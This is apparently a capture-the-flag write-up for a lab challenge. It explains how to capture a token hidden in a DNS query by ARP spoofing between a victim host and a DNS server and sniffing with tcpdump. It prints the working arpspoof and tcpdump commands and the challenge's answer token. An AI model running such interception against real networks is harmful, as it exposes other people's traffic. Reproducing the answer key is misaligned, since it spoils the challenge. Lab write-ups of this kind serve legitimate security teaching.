master
Raw Download raw file

Token 3: DNS Domain Token

Token: PCCC-Domain-Name-Simian-02-95yA

Objective

Intercept the DNS request from dnsvictim.pccc and find the token in the first label of the domain name.

Hosts

  • dnsvictim.pccc: 10.0.91.134
  • dnsmasq.pccc: 10.0.91.133

Method: ARP Spoof + DNS Capture

Step 1: Enable IP forwarding

sysctl -w net.ipv4.ip_forward=1

Step 2: ARP spoof between victim and DNS server

arpspoof -i eth1 -t 10.0.91.134 10.0.91.133 &
arpspoof -i eth1 -t 10.0.91.133 10.0.91.134 &

Step 3: Capture DNS traffic

tcpdump -i eth1 -n port 53 -A

Or more specifically:

tcpdump -i eth1 -n 'udp port 53' -l | grep -i pccc

Step 4: Observe the DNS query

The victim queries for:

PCCC-Domain-Name-Simian-02-95yA.target.pccc

The token is the first label (subdomain) of this domain name.

Why It Works

DNS queries are sent in plaintext UDP. By ARP spoofing between the victim and DNS server, all DNS traffic flows through your machine where you can observe it.

Note

This token uses alternative format PCCC-some-words-??-???? (hyphens instead of underscores and braces) to be a valid DNS label.

Cleanup

pkill arpspoof